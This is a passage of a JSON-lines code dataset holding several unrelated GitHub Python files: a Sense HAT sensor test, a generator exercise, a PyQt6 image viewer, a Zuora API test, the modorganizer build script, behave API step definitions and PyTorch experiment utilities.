{0:.2f}%\\n\".format(humid)\r\n\r\n#-----------------------------------------------\r\n\r\n#Create Scrolling text display of Enviornmental sensors\r\n#-----------------------------------------------\r\n# while True:\r\n#\r\n#     # Take readings from all three sensors\r\n#     t = sense.get_temperature()\r\n#     p = sense.get_pressure()\r\n#     h = sense.get_humidity()\r\n#\r\n#     # Round the values to one decimal place\r\n#     t = round(t, 1)\r\n#     p = round(p, 1)\r\n#     h = round(h, 1)\r\n#\r\n#     # Create the message\r\n#     # str() converts the value to a string so it can be concatenated\r\n#     message = \"Temperature: \" + str(t) + \" C... \" + \" Pressure: \" + str(p) + \" mB... \" + \" Humidity: \" + str(h) + \"%\"\r\n#\r\n#     # Display the scrolling message\r\n#     sense.show_message(message, scroll_speed=0.05)\r\n#-----------------------------------------------\r\n\r\n#Accelerometer data\r\n#-----------------------------------------------\r\nwhile True:\r\n\tacceleration = sense.get_accelerometer_raw()\r\n\tx = acceleration['x']\r\n\ty = acceleration['y']\r\n\tz = acceleration['z']\r\n\r\n\tx=round(x, 0)\r\n\ty=round(y, 0)\r\n\tz=round(z, 0)\r\n\r\n\tprint(\"x={0}, y={1}, z={2}\".format(x, y, z))\r\n#-----------------------------------------------\r\n","repo_name":"arafferty10/piSenseHat","sub_path":"senseHatTest.py","file_name":"senseHatTest.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"33887483396","text":"# #Here's an example of a generator function that produces a sequence of numbers\r\n# def my_generator(n):\r\n#     value = 0\r\n#     while value < n:\r\n#         yield value\r\n#         value = value+1\r\n    \r\n# n=int(input())\r\n# for value in my_generator(n):\r\n#     print(value)\r\n\r\n# #Generator Expression Syntax\r\n# # (expression for item in iterable)\r\n\r\n# #Example 2: Python Generator Expression\r\n# square_generator = (i*i for i in range(5))\r\n\r\n# for i in square_generator:\r\n#     print(i)\r\n\r\n# #output:-\r\n# # 0\r\n# # 1\r\n# # 4\r\n# # 9\r\n# # # 16\r\n\r\n# # Infinite list of prime numbers using Python generators........\r\n\r\ndef prime_generator():\r\n    n=1\r\n    while True:\r\n        n=n+1\r\n        # yield n only when it has no divisor in [2, sqrt(n)]\r\n        if all(n % d for d in range(2, int(n**0.5) + 1)):\r\n            yield n\r\n\r\ngenerator = prime_generator()\r\nfor i in range(10):\r\n    print(next(generator))\r\n\r\n","repo_name":"Harsh-Patidar/Python_programming","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19933108443","text":"import sys\r\nimport random\r\nimport pickle\r\nimport requests\r\nfrom PyQt6.QtWidgets import *\r\nfrom PyQt6.QtCore import Qt\r\nfrom PyQt6.QtGui import QImage, QPixmap, QPen,QPainter,QColor\r\n#Code by R-Nithish (R.No 21PD23) PSG College Of Technology, Coimbatore\r\n#\r\n# Class to download given image\r\n#\r\n# Member Functions:\r\n# 1) download()\r\n#    This function uses the requests API to download the \r\n#    image from the given URL.\r\n#\r\n\r\nclass DownloadableImage:\r\n    def __init__(self, url):\r\n        self.url = url\r\n\r\n    def download(self):\r\n        try:\r\n            response = requests.get(self.url)\r\n            img = QImage()\r\n            img.loadFromData(response.content)\r\n            return QPixmap.fromImage(img)\r\n        except Exception as e:\r\n            QMessageBox.critical(None, \"Error downloading image\", \r\n                                 f\"Unable to download an image: {e}\")\r\n            return None\r\n\r\n#\r\n# Class to initiate the GUI\r\n#\r\n\r\nclass ImageGraphicsScene(QGraphicsScene):\r\n    def __init__(self):\r\n        
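# the scene keeps a handle to its single dotted center line so it can be cleared before each redraw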
super().__init__()\r\n self.center_line = None\r\n\r\n def clear_center_line(self):\r\n if self.center_line:\r\n self.removeItem(self.center_line)\r\n self.center_line = None\r\n\r\n def draw_center_line(self, start, end):\r\n pen = QPen()\r\n pen.setWidth(2)\r\n pen.setStyle(Qt.PenStyle.DotLine)\r\n\r\n self.center_line = \\\r\n self.addLine(start.x(), start.y(), end.x(), end.y(), pen)\r\n\r\n#\r\n# Class to initiate the main window\r\n#\r\n# Member Functions:\r\n# 1) init_gui()\r\n# Adding buttons and defining layout.\r\n# \r\n# 2) add_image()\r\n# Adding functionality to the add image button.\r\n#\r\n# 3) group_images()\r\n# Adding functionality to group image button.\r\n#\r\n# 4) get_random_image_url()\r\n# Use random function to choose a random URL from \r\n# the given set of image URL.\r\n#\r\n# 5) connnect_central_points()\r\n# Adding functionality to the connect central points \r\n# button.\r\n#\r\n\r\nclass MainWindow(QMainWindow):\r\n def __init__(self):\r\n super(MainWindow, self).__init__()\r\n\r\n self.init_gui()\r\n\r\n def init_gui(self):\r\n self.scene = ImageGraphicsScene()\r\n self.view = QGraphicsView(self.scene)\r\n\r\n self.button_add = QPushButton(\"Add Image\")\r\n self.button_add.clicked.connect(self.add_image)\r\n\r\n self.button_group = QPushButton(\"Group Images\")\r\n self.button_group.clicked.connect(self.group_images)\r\n\r\n self.button_connect_center = \\\r\n QPushButton(\"Connect Image Centers\")\r\n self.button_connect_center.setCheckable(True)\r\n self.button_connect_center.clicked.connect\\\r\n (self.connect_central_points)\r\n\r\n layout = QVBoxLayout()\r\n layout.addWidget(self.view)\r\n layout.addWidget(self.button_add)\r\n layout.addWidget(self.button_group)\r\n layout.addWidget(self.button_connect_center)\r\n\r\n container = QWidget()\r\n container.setLayout(layout)\r\n self.setCentralWidget(container)\r\n\r\n self.setGeometry(100, 100, 1280, 720)\r\n self.setWindowTitle(\"Image viewer\")\r\n\r\n def add_image(self):\r\n random_image_url = self.get_random_image_url()\r\n downloadable_image = DownloadableImage(random_image_url)\r\n image = downloadable_image.download() \r\n\r\n if image:\r\n x, y = random.randint(0, 600), random.randint(0, 400)\r\n item = self.scene.addPixmap(image)\r\n item.setPos(x, y)\r\n item.setFlag(QGraphicsItem.GraphicsItemFlag.ItemIsMovable)\r\n item.setFlag \\\r\n (QGraphicsItem.GraphicsItemFlag.ItemIsSelectable)\r\n\r\n width, height = image.width(), image.height()\r\n image_color = None\r\n for i in range(width):\r\n for j in range(height):\r\n color = image.toImage().pixelColor(i, j)\r\n if color.alpha() > 0:\r\n image_color = color\r\n break\r\n\r\n if image_color:\r\n QMessageBox.information(self, \"Image Information\",\r\n f\"Image size: {width} x {height}\")\r\n\r\n def group_images(self):\r\n group = QGraphicsItemGroup()\r\n for item in self.view.scene().selectedItems():\r\n group.addToGroup(item)\r\n\r\n self.view.scene().addItem(group)\r\n group.setFlag(QGraphicsItem.GraphicsItemFlag.ItemIsMovable)\r\n group.setFlag(QGraphicsItem.GraphicsItemFlag.ItemIsSelectable)\r\n\r\n def get_random_image_url(self):\r\n with open(\"Images.dat\",'rb') as file :\r\n url = random.choice(pickle.load(file))\r\n return \"https://raw.githubusercontent.com/hfg-gmuend/\"+\\\r\n \"openmoji/44c02495e040c52fbea0bfb1cba89aa24754f9a8/\"+\\\r\n \"src/symbols/geometric/\"+url\r\n\r\n def connect_central_points(self, checked):\r\n if checked:\r\n self.view.setRenderHint(QPainter.RenderHint.Antialiasing)\r\n \r\n self.view.setRenderHint\\\r\n 
(QPainter.RenderHint.SmoothPixmapTransform)\r\n            \r\n            selected_items = self.view.scene().selectedItems()\r\n\r\n            if len(selected_items) < 2:\r\n                QMessageBox.warning\\\r\n                (self, \"Cannot Connect Centers\", \r\n                 \"Select at least two items to connect centers.\")\r\n                \r\n                self.button_connect_center.setChecked(False)\r\n            else:\r\n                self.scene.clear_center_line()\r\n                p1 = selected_items[0].sceneBoundingRect().center()\r\n                p2 = selected_items[1].sceneBoundingRect().center()\r\n                self.scene.draw_center_line(p1, p2)\r\n        else:\r\n            self.view.setRenderHint \\\r\n            (QPainter.RenderHint.Antialiasing, False)\r\n            \r\n            self.view.setRenderHint\\\r\n            (QPainter.RenderHint.SmoothPixmapTransform, False)\r\n            \r\n            self.scene.clear_center_line()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    app = QApplication(sys.argv)\r\n    window = MainWindow()\r\n    window.show()\r\n    sys.exit(app.exec())","repo_name":"Nitaksh/ImageViewer","sub_path":"Image_Viewer.py","file_name":"Image_Viewer.py","file_ext":"py","file_size_in_byte":6113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19427479902","text":"import unittest\nfrom ..zuora.yaml_credentials import YAMLCredentials\nfrom ..zuora.zapi import ZAPI, ZAPIError\nfrom ..zuora.class_fields import ClassFields\n\n\nclass TestClassFields(unittest.TestCase):\n    \n    def setUp(self):\n        self._session = ZAPI(YAMLCredentials('.creds', 'zuora', 'dev'))\n    \n    def test_get_fields(self):\n        describe = ClassFields(self._session, 'Subscription')\n        self.assertNotEqual(len(describe), 0)\n\n    def test_get_fields_non_existing_class_raise(self):\n        with self.assertRaises(ZAPIError):\n            describe = ClassFields(self._session, 'NotAClass')\n\n    def test_get_fields_non_existing_class_raise_code(self):\n        try:\n            describe = ClassFields(self._session, 'NotAClass')\n        except ZAPIError as e:\n            self.assertEqual(e.code, 500)\n    \n\nif __name__ == '__main__':\n    unittest.main()\n\n","repo_name":"legibe/mogan","sub_path":"mogan/tests/test_class_fields.py","file_name":"test_class_fields.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"26893566835","text":"from unibuild import Project\nfrom unibuild.modules import github, cmake, Patch, git, hg, msbuild, build, dummy\nfrom unibuild.utility import lazy, FormatDict\nfrom config import config\nfrom functools import partial\nfrom string import Formatter\nimport os, sys\n\n\n\"\"\"\nSettings\n\"\"\"\n\nloot_version = \"0.10.3\"\ncommit_id = \"g0fcf788\"\n\n\"\"\"\nProjects\n\"\"\"\n\n\nfrom unibuild.projects import sevenzip, qt5, boost, zlib, python, sip, pyqt5, ncc\nfrom unibuild.projects import asmjit, udis86, googletest, spdlog, fmtlib, lz4, WixToolkit\n\n# TODO modorganizer-lootcli needs an overhaul as the api has changed alot\ndef bitness():\n    return \"x64\" if config['architecture'] == \"x86_64\" else \"Win32\"\n\t\nProject(\"LootApi\") \\\n    .depend(Patch.Copy(\"loot_api.dll\".format(loot_version, commit_id), os.path.join(config[\"paths\"][\"install\"], \"bin\", \"loot\"))\n    .depend(github.Release(\"loot\", \"loot\", loot_version, \"loot-api_{}-0-{}_dev_{}\".format(loot_version, commit_id, bitness()),\"7z\",tree_depth=1)\n    .set_destination(\"lootapi\"))\n    )\n\n\ntl_repo = git.SuperRepository(\"modorganizer_super\")\n\ndef gen_userfile_content(project):\n    with open(\"CMakeLists.txt.user.template\", 'r') as f:\n        res = Formatter().vformat(f.read(), [], FormatDict({\n            'build_dir'     : project['edit_path'],\n            'environment_id': 
config['qt_environment_id'],\n 'profile_name' : config['qt_profile_name'],\n 'profile_id' : config['qt_profile_id']\n }))\n return res\n\n\ncmake_parameters = [\n \"-DCMAKE_BUILD_TYPE={}\".format(config[\"build_type\"]),\n \"-DDEPENDENCIES_DIR={}\".format(config[\"paths\"][\"build\"]),\n#\tboost git version \t\"-DBOOST_ROOT={}/build/boostgit\",\n \"-DBOOST_ROOT={}/boost_{}\".format(config[\"paths\"][\"build\"], config[\"boost_version\"].replace(\".\", \"_\")),\n]\n\n\nif config.get('optimize', False):\n cmake_parameters.append(\"-DOPTIMIZE_LINK_FLAGS=\\\"/LTCG /INCREMENTAL:NO /OPT:REF /OPT:ICF\\\"\")\n\n\nusvfs = Project(\"usvfs\")\n\nusvfs.depend(cmake.CMake().arguments(cmake_parameters +\n [\"-DCMAKE_INSTALL_PREFIX:PATH={}\".format(config[\"paths\"][\"install\"])] +\n [\"-DPROJ_ARCH={}\".format(\"x86\" if config['architecture'] == 'x86' else \"x64\")])\n .install()\n # TODO Not sure why this is required, will look into it at a later stage once we get the rest to build\n .depend(github.Source(config['Main_Author'], \"usvfs\", \"master\")\n .set_destination(\"usvfs\"))\n .depend(\"AsmJit\")\n .depend(\"Udis86\")\n .depend(\"GTest\")\n .depend(\"fmtlib\")\n .depend(\"spdlog\")\n .depend(\"boost\")\n )\n\n\nif config['architecture'] == 'x86_64':\n usvfs_32 = Project(\"usvfs_32\")\n usvfs_32.depend(build.Run_With_Output(r'\"{0}\" unimake.py -d \"{1}\" --set architecture=\"x86\" -b \"build_32\" -p \"progress_32\" -i \"install_32\" usvfs'.format(sys.executable,config['__build_base_path']),\n name=\"Building usvfs 32bit Dll\",environment=config['__Default_environment'],working_directory=os.path.join(os.getcwd())))\nelse:\n usvfs_32 = Project(\"usvfs_32\")\n usvfs_32.depend(dummy.Success(\"usvfs_32\"))\n\nfor author, git_path, path, branch, dependencies, Build in [\n (config['Main_Author'], \"modorganizer-game_features\", \"game_features\", \"master\", [],False),\n (config['Main_Author'], \"modorganizer-archive\", \"archive\", \"master\", [\"7zip\", \"Qt5\"],True),\n (config['Main_Author'], \"modorganizer-uibase\", \"uibase\", \"QT5.7\", [\"Qt5\", \"boost\"],True),\n (config['Main_Author'], \"modorganizer-lootcli\", \"lootcli\", \"master\", [\"LootApi\", \"boost\"],True),\n (config['Main_Author'], \"modorganizer-esptk\", \"esptk\", \"master\", [\"boost\"],True),\n (config['Main_Author'], \"modorganizer-bsatk\", \"bsatk\", \"master\", [\"zlib\",\"boost\"],True),\n (config['Main_Author'], \"modorganizer-nxmhandler\", \"nxmhandler\", \"master\", [\"Qt5\"],True),\n (config['Main_Author'], \"modorganizer-helper\", \"helper\", \"master\", [\"Qt5\"],True),\n (config['Main_Author'], \"modorganizer-game_gamebryo\", \"game_gamebryo\", \"new_vfs_library\", [\"Qt5\", \"modorganizer-uibase\",\n \"modorganizer-game_features\", \"lz4\"],True),\n (config['Main_Author'], \"modorganizer-game_oblivion\", \"game_oblivion\", \"master\", [\"Qt5\", \"modorganizer-uibase\",\n \"modorganizer-game_gamebryo\",\n \"modorganizer-game_features\"],True),\n (config['Main_Author'], \"modorganizer-game_fallout3\", \"game_fallout3\", \"master\", [\"Qt5\", \"modorganizer-uibase\",\n \"modorganizer-game_gamebryo\",\n \"modorganizer-game_features\"],True),\n (config['Main_Author'], \"modorganizer-game_fallout4\", \"game_fallout4\", \"master\", [\"Qt5\", \"modorganizer-uibase\",\n \"modorganizer-game_gamebryo\",\n \"modorganizer-game_features\"],True),\n (config['Main_Author'], \"modorganizer-game_falloutnv\", \"game_falloutnv\", \"master\", [\"Qt5\", \"modorganizer-uibase\",\n \"modorganizer-game_gamebryo\",\n 
\"modorganizer-game_features\"],True),\n (config['Main_Author'], \"modorganizer-game_skyrim\", \"game_skyrim\", \"master\", [\"Qt5\", \"modorganizer-uibase\",\n \"modorganizer-game_gamebryo\",\n \"modorganizer-game_features\"],True),\n (\"LePresidente\", \"modorganizer-game_skyrimSE\", \"game_skyrimse\", \"dev\", [\"Qt5\", \"modorganizer-uibase\",\n \"modorganizer-game_gamebryo\",\n \"modorganizer-game_features\"],True),\n (config['Main_Author'], \"modorganizer-tool_inieditor\", \"tool_inieditor\", \"master\", [\"Qt5\", \"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-tool_inibakery\", \"tool_inibakery\", \"master\", [\"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-tool_configurator\", \"tool_configurator\", \"QT5.7\", [\"PyQt5\"],True),\n (config['Main_Author'], \"modorganizer-preview_base\", \"preview_base\", \"master\", [\"Qt5\", \"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-diagnose_basic\", \"diagnose_basic\", \"master\", [\"Qt5\", \"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-check_fnis\", \"check_fnis\", \"master\", [\"Qt5\", \"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-installer_bain\", \"installer_bain\", \"QT5.7\", [\"Qt5\", \"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-installer_manual\", \"installer_manual\", \"QT5.7\", [\"Qt5\", \"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-installer_bundle\", \"installer_bundle\", \"master\", [\"Qt5\", \"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-installer_quick\", \"installer_quick\", \"master\", [\"Qt5\", \"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-installer_fomod\", \"installer_fomod\", \"master\", [\"Qt5\", \"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-installer_ncc\", \"installer_ncc\", \"master\", [\"Qt5\", \"modorganizer-uibase\", \"NCC\"],True),\n (config['Main_Author'], \"modorganizer-bsa_extractor\", \"bsa_extractor\", \"master\", [\"Qt5\", \"modorganizer-uibase\"],True),\n (config['Main_Author'], \"modorganizer-plugin_python\", \"plugin_python\", \"master\", [\"Qt5\", \"boost\", \"Python\", \"modorganizer-uibase\",\n \"sip\"],True),\n (config['Main_Author'], \"githubpp\", \"githubpp\", \"master\", [\"Qt5\"],True),\n (config['Main_Author'], \"modorganizer\", \"modorganizer\", \"QT5.7\", [\"Qt5\", \"boost\", \"usvfs_32\",\n \"modorganizer-uibase\", \"modorganizer-archive\",\n \"modorganizer-bsatk\", \"modorganizer-esptk\",\n \"modorganizer-game_features\",\n \"usvfs\",\"githubpp\", \"NCC\"], True),\n]:\n build_step = cmake.CMake().arguments(cmake_parameters +\n [\"-DCMAKE_INSTALL_PREFIX:PATH={}\".format(config[\"paths\"][\"install\"])])\\\n .install()\n\n for dep in dependencies:\n build_step.depend(dep)\n\n project = Project(git_path)\n\n if Build:\n project.depend(build_step.depend(github.Source(author, git_path, branch, super_repository=tl_repo)\n .set_destination(path)))\n else:\n project.depend(github.Source(author, git_path, branch, super_repository=tl_repo)\n .set_destination(path))\n\n\n\ndef python_zip_collect(context):\n import libpatterns\n import glob\n from zipfile import ZipFile\n\n ip = os.path.join(config[\"paths\"][\"install\"], \"bin\")\n bp = python.python['build_path']\n\n with ZipFile(os.path.join(ip, \"python27.zip\"), \"w\") as pyzip:\n for pattern in libpatterns.patterns:\n for f in glob.iglob(os.path.join(bp, pattern)):\n pyzip.write(f, 
f[len(bp):])\n\n return True\n\n\nProject(\"python_zip\") \\\n .depend(build.Execute(python_zip_collect)\n .depend(\"Python\")\n )\n\nif config['Installer']:\n #build_installer = cmake.CMake().arguments(cmake_parameters +[\"-DCMAKE_INSTALL_PREFIX:PATH={}/installer\".format(config[\"__build_base_path\"])]).install()\n wixinstaller = Project(\"WixInstaller\")\n\n wixinstaller.depend(github.Source(config['Main_Author'],\"modorganizer-WixInstaller\", \"VSDev\", super_repository=tl_repo)\n .set_destination(\"WixInstaller\"))\\\n .depend(\"modorganizer\").depend(\"usvfs\").depend(\"usvfs_32\")\n\n\n","repo_name":"TanninOne/modorganizer-umbrella","sub_path":"makefile.uni.py","file_name":"makefile.uni.py","file_ext":"py","file_size_in_byte":12381,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"51"} +{"seq_id":"41415841141","text":"from behave import (\n use_step_matcher,\n when,\n step,\n)\nfrom rest_framework.reverse import reverse\n\nfrom core.models import Tag\nfrom recipe.serializers import TagSerializer\n\nuse_step_matcher(\"cfparse\")\n\n\nTAGS_URL = reverse(\"recipe:tag-list\")\n\n\n@when(\"I call the tag list API\")\ndef step_impl(context):\n \"\"\"\n :type context: behave.runner.Context\n \"\"\"\n context.url_response = context.test_client.get(TAGS_URL)\n\n\n@step(\"All of my tags are in the response ordered by name\")\ndef step_impl(context):\n \"\"\"\n :type context: behave.runner.Context\n \"\"\"\n tags = Tag.objects.all().order_by(\"-name\")\n serializer = TagSerializer(tags, many=True)\n context.test_case.assertEquals(context.url_response.data, serializer.data)\n\n\n@step('The response contains \"1\" key')\ndef step_impl(context):\n \"\"\"\n :type context: behave.runner.Context\n \"\"\"\n data = context.url_response.data\n context.test_case.assertEquals(len(data), 1)\n\n\n@step('the tag \"{tagname}\" is returned in the response')\ndef step_impl(context, tagname):\n \"\"\"\n :type context: behave.runner.Context\n \"\"\"\n data = context.url_response.data\n context.test_case.assertEquals(data[0][\"name\"], tagname)\n\n\n@when(\"I call the tag API with the following payload:\")\n@when(\"I call the tag API with the following payload\")\ndef step_impl(context):\n \"\"\"\n :type context: behave.runner.Context\n \"\"\"\n tag_name = context.table.rows[0][0]\n payload = {\n \"name\": tag_name\n }\n\n context.url_response = context.test_client.post(TAGS_URL, payload)\n\n\n@when(\"I call the tag API with an empty name\")\ndef step_impl(context):\n \"\"\"\n :type context: behave.runner.Context\n \"\"\"\n payload = {\n \"name\": \"\",\n }\n\n context.url_response = context.test_client.post(TAGS_URL, payload)\n","repo_name":"Zemeio/pythontddcourse","sub_path":"app/features/steps/tags_api.py","file_name":"tags_api.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42053026819","text":"def three_seq_one(number):\n while number != 1:\n print(number, end=\", \")\n if number % 2 == 0:\n number = number // 2\n else:\n number = number * 3 + 1\n print(number, end=\".\\n\")\n\n\nthree_seq_one(3)\n\nfor i in range(10):\n print(i, \"\\t\", 2 ** i)\n\nfor i in range(1, 7):\n print(i + 2, end=\" \")\n\nfor i in [12, 4, 5, 9, 23]:\n if i % 2 == 1:\n continue\n print(i)\n\nnum = int(input(\"enter number: \"))\nwhile True:\n three_seq_one(num)\n response = input(\"Do you want to perform another task? 
\").lower()\n if response != \"yes\":\n break\n else:\n raise ValueError(\"Wrong Input\")\n\nceleb = [(\"michael\", 1995), (\"mercy\", 1995), (\"Elizabeth\", 1999)]\n\nfor (name, year) in celeb:\n print(name, end=\", \")\n print(year, end=\".\\n\")\n\nstudents = [('amaka', ['com sci', 'economics']),\n ('shile', ['Software Eng', 'design']),\n ('nne', ['com sci', 'data science']),\n ('toheeb', ['com sci', 'economics', 'english']),\n ('chinedu', ['com sci', 'economics', 'mathematics'])]\nfor name, course in students:\n print(name, \"takes\", len(course), \"course\", end=\".\\n\")\n\nfor name, course in students:\n print(list(enumerate(name)))\n print(name)\n\n","repo_name":"akenz1901/Kata-journey-two","sub_path":"chapter_three/working_with_end_operator.py","file_name":"working_with_end_operator.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"30820991002","text":"import os\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom tqdm import tqdm\nfrom skimage.transform import resize\n\nfrom .utils import load_json, dump_json, load_pred, get_pred, get_spatial, rl_enc, load\nfrom .torch_models.torch_utils import to_np, to_var, logits2pred\nfrom .torch_models.model import fit_model\nfrom .dataset import Dataset, DatasetTest\n\n\ndef generate_experiment(exp_path, cv_splits, dataset, split_type='tvt', task_type='segm'):\n \"\"\"Generates experiment with given parameters. Main information saves in config.\n\n Parameters\n ----------\n exp_path: str\n Path where to generate experiment and save config.\n\n cv_splits: list\n List of dict(s), which describes cross-val splitting of experiment.\n\n dataset: class\n Dataset like object.\n\n split_type: str, optional\n Type of split: train-val-test (`tvt`) or train-val (`tv`).\n\n task_type: str, optional\n Type of task: segmentation (`segm`) or other (`other`), for example regression.\n \"\"\"\n if not os.path.exists(exp_path):\n os.makedirs(exp_path)\n else:\n assert False, f'Experiment `{exp_path}` already exists.'\n\n assert split_type in ('tvt', 'tv'), \\\n f'experiment type should be `tvt` or `tv`, {split_type} given'\n\n assert task_type in ('segm', 'other'), \\\n f'experiment type should be `segm` or `other`, {task_type} given'\n\n config = {'data_path': dataset.data_path,\n 'modalities': dataset.modalities,\n 'features': dataset.features,\n 'target': dataset.target,\n 'n_splits': len(cv_splits),\n 'split_type': split_type,\n 'task_type': task_type}\n dump_json(config, os.path.join(exp_path, 'config.json'))\n\n for i, split in enumerate(cv_splits):\n val_path = os.path.join(exp_path, f'experiment_{i}')\n os.mkdir(val_path)\n\n dump_json(list(np.array(split['train_ids'], dtype='str')), os.path.join(val_path, 'train_ids.json'))\n dump_json(list(np.array(split['val_ids'], dtype='str')), os.path.join(val_path, 'val_ids.json'))\n\n if split_type == 'tvt':\n dump_json(list(np.array(split['test_ids'], dtype='str')), os.path.join(val_path, 'test_ids.json'))\n elif split_type == 'tv':\n pass\n\n\ndef load_val_data(exp_path, n_val):\n \"\"\"Loads stacks of images to validate model on.\n\n Parameters\n ----------\n exp_path: str\n Path where to load experiment info from.\n\n n_val: int\n The id of validation (depends on number of generated experiments).\n\n Returns\n -------\n x_val, y_val: np.ndarray\n \"\"\"\n config_path = os.path.join(exp_path, 'config.json')\n\n config = load_json(config_path)\n ds = Dataset(data_path=config['data_path'], 
modalities=config['modalities'],\n features=config['features'], target=config['target'])\n\n val_path = os.path.join(exp_path, f'experiment_{n_val}')\n\n val_ids = np.array(load_json(os.path.join(val_path, 'val_ids.json')), dtype='int64')\n\n x_val, y_val = [], []\n for _id in val_ids:\n x_val.append(ds.load_x(_id))\n y_val.append(ds.load_y(_id))\n x_val = np.array(x_val, dtype='float32')\n y_val = np.array(y_val, dtype='float32')\n\n return x_val, y_val\n\n\ndef calculate_metrics(exp_path, n_val, metrics_dict):\n \"\"\"Calculates and saves test metric values in `test_metrics` folder.\n\n Parameters\n ----------\n exp_path: str\n Path to the experiment.\n\n n_val: int\n The id of cross-val to calculates metrics in.\n\n metrics_dict: dict\n dict containing metrics names which map into (`function`, `apply_scaling`).\n `apply_scaling` is `bool` value indicates apply or not the scaling on prediction.\n \"\"\"\n config_path = os.path.join(exp_path, 'config.json')\n config = load_json(config_path)\n\n assert config['split_type'] == 'tvt', \\\n f'There is no test items to calculate metrics'\n\n ds = Dataset(data_path=config['data_path'], modalities=config['modalities'],\n features=config['features'], target=config['target'])\n\n val_path = os.path.join(exp_path, f'experiment_{n_val}')\n pred_path = os.path.join(val_path, 'test_predictions')\n\n metric_path = os.path.join(val_path, 'test_metrics')\n if not os.path.exists(metric_path):\n os.makedirs(metric_path)\n\n test_ids_str = load_json(os.path.join(val_path, 'test_ids.json'))\n test_ids = np.array(test_ids_str, dtype='int64')\n\n if config['task_type'] == 'segm':\n pred_fn = get_pred\n else: # == 'other'\n pred_fn = get_spatial\n\n for metric_name in metrics_dict.keys():\n metric_fn = metrics_dict[metric_name]\n\n results = {}\n for _id, _id_str in zip(test_ids, test_ids_str):\n pred = pred_fn(load_pred(_id, pred_path))\n mask = pred_fn(ds.load_y(_id))\n\n result = metric_fn(mask, pred)\n results[_id_str] = result\n # end for\n\n metric_filename = os.path.join(metric_path, metric_name + '.json')\n assert not os.path.exists(metric_filename), \\\n f'metric {metric_name} has already been calculated'\n dump_json(results, metric_filename)\n # end for\n\n\ndef get_experiment_result(exp_path, n_splits, metric_name):\n val_results = []\n\n for i in range(n_splits):\n metric_path = os.path.join(exp_path, f'experiment_{i}/test_metrics/{metric_name}.json')\n results_dict = load_json(metric_path)\n\n val_mean = np.mean(list(results_dict.values()))\n val_results.append(val_mean)\n # end for\n\n return np.mean(val_results)\n\n\ndef make_predictions(exp_path, n_val):\n \"\"\"Makes test predictions and saves them in `test_predictions` folder.\n\n Parameters\n ----------\n exp_path: str\n Path to the experiment.\n\n n_val: int\n The id of cross-val to make predictions in.\n \"\"\"\n config_path = os.path.join(exp_path, 'config.json')\n\n config = load_json(config_path)\n ds = Dataset(data_path=config['data_path'], modalities=config['modalities'],\n features=config['features'], target=config['target'])\n\n val_path = os.path.join(exp_path, f'experiment_{n_val}')\n\n model = torch.load(os.path.join(val_path, 'model.pt'))\n model = model.cuda()\n\n pred_path = os.path.join(val_path, 'test_predictions')\n if not os.path.exists(pred_path):\n os.makedirs(pred_path)\n\n test_ids_str = load_json(os.path.join(val_path, 'test_ids.json'))\n test_ids = np.array(test_ids_str, dtype='int64')\n\n for _id, _id_str in zip(test_ids, test_ids_str):\n x = ds.load_x(_id)\n\n # DO 
INFERENCE STEP:\n with torch.no_grad():\n model.eval()\n x_t = to_var(np.array([x], dtype='float32'), requires_grad=False)\n y = to_np(logits2pred(model(x_t)))[0]\n\n y_filename = os.path.join(pred_path, _id_str + '.npy')\n\n np.save(y_filename, y)\n\n del x, x_t, y\n # end for\n\n\ndef do_experiment(exp_path, n_val):\n \"\"\"Performs learning, making predictions and calculating metrics processes.\"\"\"\n\n print('>>> loading resources..')\n\n val_path = os.path.join(exp_path, f'experiment_{n_val}')\n resources = load(os.path.join(val_path, 'resources.gz'))\n\n torch_model = resources['torch_model']\n batch_iter = resources['batch_iter']\n epochs = resources['epochs']\n steps_per_epoch = resources['steps_per_epoch']\n saving_model_mode = resources['saving_model_mode']\n metrics_dict = resources['metrics_dict']\n\n val_data = load_val_data(exp_path=exp_path, n_val=n_val)\n\n print('>>> fitting model..')\n\n fit_model(\n torch_model=torch_model, generator=batch_iter.flow(), val_path=val_path, val_data=val_data,\n epochs=epochs, steps_per_epoch=steps_per_epoch, verbose=True,\n saving_model_mode=saving_model_mode\n )\n\n print('>>> making predictions..')\n make_predictions(exp_path=exp_path, n_val=n_val)\n\n print('>>> calculating metrics..')\n calculate_metrics(exp_path=exp_path, n_val=n_val, metrics_dict=metrics_dict)\n\n\ndef test2csv_pred(prep_test_path, csv_filename, model, modalities=['image'], features=None,\n threshold=0.5):\n \"\"\"Converts test images with given `model` into submission-ready csv-file.\n\n Parameters\n ----------\n prep_test_path: str\n Path to stored test data with generated `metadata`.\n\n csv_filename: str\n Filename of csv-file to save. Should have 'some_name.csv' structure.\n\n model: torch.nn.Module, or the same\n Model to do predictions with.\n\n modalities: list, optional\n List of modalities to load as channel(s) of the single image.\n\n features: list, optional\n List of features to load as additional channel(s) of the single image.\n\n threshold: float\n Threshold to make binary prediction. Must be between 0. 
